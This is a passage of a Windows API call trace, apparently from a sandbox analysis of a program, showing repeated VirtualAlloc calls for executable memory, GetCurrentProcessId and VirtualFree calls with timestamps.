dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x2cc0000 [0261.488] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x2cd0000 [0261.488] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2ce0000 [0261.488] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x2cf0000 [0261.489] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2d00000 [0261.489] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2d10000 [0261.490] VirtualAlloc (lpAddress=0x0, dwSize=0x1af, flAllocationType=0x1000, flProtect=0x40) returned 0x2d20000 [0261.490] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x2d30000 [0261.490] GetCurrentProcessId () returned 0xc88 [0261.490] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2d40000 [0261.491] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x2d50000 [0261.491] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2d60000 [0261.492] VirtualAlloc (lpAddress=0x0, dwSize=0x65, flAllocationType=0x1000, flProtect=0x40) returned 0x2d70000 [0261.492] VirtualAlloc (lpAddress=0x0, dwSize=0x3a6, flAllocationType=0x1000, flProtect=0x40) returned 0x2d80000 [0261.493] VirtualAlloc (lpAddress=0x0, dwSize=0x139, flAllocationType=0x1000, flProtect=0x40) returned 0x2d90000 [0261.493] VirtualAlloc (lpAddress=0x0, dwSize=0x388, flAllocationType=0x1000, flProtect=0x40) returned 0x2da0000 [0261.493] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x1000, flProtect=0x40) returned 0x2db0000 [0261.494] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2dc0000 [0261.494] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x2dd0000 [0261.495] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x2de0000 [0261.495] GetCurrentProcessId () returned 0xc88 [0261.495] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2df0000 [0261.496] VirtualAlloc (lpAddress=0x0, dwSize=0xc5, flAllocationType=0x1000, flProtect=0x40) returned 0x2e00000 [0261.496] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2e10000 [0261.497] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2e20000 [0261.497] VirtualAlloc (lpAddress=0x0, dwSize=0x281, flAllocationType=0x1000, flProtect=0x40) returned 0x2e30000 [0261.498] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x1000, flProtect=0x40) returned 0x2e40000 [0261.498] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2e50000 [0261.499] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2e60000 [0261.499] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x1000, flProtect=0x40) returned 0x2e70000 [0261.500] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x2e80000 [0261.500] VirtualAlloc (lpAddress=0x0, dwSize=0x323, flAllocationType=0x1000, flProtect=0x40) returned 0x2e90000 [0261.501] VirtualAlloc (lpAddress=0x208c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x208c000 [0261.501] GetCurrentProcessId () returned 0xc88 [0261.502] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2ea0000 [0261.502] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x2eb0000 [0261.503] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2ec0000 [0261.503] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x2ed0000 [0261.503] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x2ee0000 [0261.504] VirtualAlloc (lpAddress=0x0, dwSize=0x42b, flAllocationType=0x1000, flProtect=0x40) returned 0x2ef0000 [0261.504] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2f00000 [0261.505] VirtualAlloc (lpAddress=0x0, dwSize=0x20b, flAllocationType=0x1000, flProtect=0x40) returned 0x2f10000 [0261.505] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x2f20000 [0261.505] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x2f30000 [0261.506] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x2f40000 [0261.506] GetCurrentProcessId () returned 0xc88 [0261.506] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2f50000 [0261.507] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x2f60000 [0261.507] VirtualAlloc (lpAddress=0x0, dwSize=0x65f, flAllocationType=0x1000, flProtect=0x40) returned 0x2f70000 [0261.507] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x1000, flProtect=0x40) returned 0x2f80000 [0261.508] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2f90000 [0261.508] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x2fa0000 [0261.509] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2fb0000 [0261.509] VirtualAlloc (lpAddress=0x0, dwSize=0x418, flAllocationType=0x1000, flProtect=0x40) returned 0x2fc0000 [0261.511] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x2fd0000 [0261.511] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe0000 [0261.512] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff0000 [0261.512] VirtualAlloc (lpAddress=0x2090000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2090000 [0261.513] GetCurrentProcessId () returned 0xc88 [0261.513] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3000000 [0261.513] VirtualAlloc (lpAddress=0x0, dwSize=0x26a, flAllocationType=0x1000, flProtect=0x40) returned 0x3010000 [0261.514] VirtualAlloc (lpAddress=0x0, dwSize=0x81, flAllocationType=0x1000, flProtect=0x40) returned 0x3020000 [0261.514] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x1000, flProtect=0x40) returned 0x3030000 [0261.515] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x3040000 [0261.515] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x3050000 [0261.516] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x3060000 [0261.516] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3070000 [0261.517] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3080000 [0261.517] VirtualAlloc (lpAddress=0x0, dwSize=0x396, flAllocationType=0x1000, flProtect=0x40) returned 0x3090000 [0261.518] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x30a0000 [0261.519] GetCurrentProcessId () returned 0xc88 [0261.519] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x30b0000 [0261.519] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x30c0000 [0261.520] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x30d0000 [0261.520] VirtualAlloc (lpAddress=0x0, dwSize=0x521, flAllocationType=0x1000, flProtect=0x40) returned 0x30e0000 [0261.521] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x30f0000 [0261.521] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x3100000 [0261.522] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3110000 [0261.522] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x3120000 [0261.523] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x1000, flProtect=0x40) returned 0x3130000 [0261.523] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x3140000 [0261.524] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x3150000 [0261.524] GetCurrentProcessId () returned 0xc88 [0261.524] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3160000 [0261.525] VirtualAlloc (lpAddress=0x0, dwSize=0x8b, flAllocationType=0x1000, flProtect=0x40) returned 0x3170000 [0261.569] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x3180000 [0261.570] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x3190000 [0261.571] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x31a0000 [0261.572] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x31b0000 [0261.573] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x31c0000 [0261.573] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x31d0000 [0261.574] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x31e0000 [0261.575] VirtualAlloc (lpAddress=0x0, dwSize=0x371, flAllocationType=0x1000, flProtect=0x40) returned 0x31f0000 [0261.575] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x1000, flProtect=0x40) returned 0x3200000 [0261.576] VirtualAlloc (lpAddress=0x2094000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2094000 [0261.577] GetCurrentProcessId () returned 0xc88 [0261.577] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3210000 [0261.578] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x3220000 [0261.579] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x3230000 [0261.579] VirtualAlloc (lpAddress=0x0, dwSize=0x327, flAllocationType=0x1000, flProtect=0x40) returned 0x3240000 [0261.580] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3250000 [0261.581] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x3260000 [0261.581] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x3270000 [0261.582] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3280000 [0261.583] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x3290000 [0261.583] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x32a0000 [0261.584] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x32b0000 [0261.586] GetCurrentProcessId () returned 0xc88 [0261.586] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x32c0000 [0261.587] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x32d0000 [0261.588] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x32e0000 [0261.589] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x32f0000 [0261.590] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x3300000 [0261.591] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x3310000 [0261.592] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x3320000 [0261.593] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3330000 [0261.594] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3340000 [0261.594] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x3350000 [0261.595] VirtualAlloc (lpAddress=0x0, dwSize=0x1f3, flAllocationType=0x1000, flProtect=0x40) returned 0x3360000 [0261.596] GetCurrentProcessId () returned 0xc88 [0261.596] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3370000 [0261.597] VirtualAlloc (lpAddress=0x0, dwSize=0x18a, flAllocationType=0x1000, flProtect=0x40) returned 0x3380000 [0261.598] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3390000 [0261.599] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x33a0000 [0261.600] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x33b0000 [0261.601] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x33c0000 [0261.761] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.762] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.763] GetCurrentProcessId () returned 0xc88 [0261.764] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] GetCurrentProcessId () returned 0xc88 [0261.765] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.766] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.767] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.768] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.769] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.770] GetCurrentProcessId () returned 0xc88 [0261.771] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0261.771] GetCurrentProcessId () returned 0xc88 [0261.771] GetCurrentProcessId () returned 0xc88 [0261.771] GetCurrentProcessId () returned 0xc88 [0261.771] GetCurrentProcessId () returned 0xc88 [0261.771] GetCurrentProcessId () returned 0xc88 [0261.771] GetCurrentProcessId () returned 0xc88 [0261.771] GetCurrentProcessId () returned 0xc88 [0261.772] GetCurrentProcessId () returned 0xc88 [0261.772] GetCurrentProcessId () returned 0xc88 [0261.772] GetCurrentProcessId () returned 0xc88 [0261.772] GetCurrentProcessId () returned 0xc88 [0261.772] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.773] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0261.774] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.191] GetCurrentProcessId () returned 0xc88 [0262.192] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.193] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.194] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.195] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.196] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.197] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.198] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.199] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.200] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.201] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.202] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.203] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.204] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.206] VirtualFree (lpAddress=0x3430000, 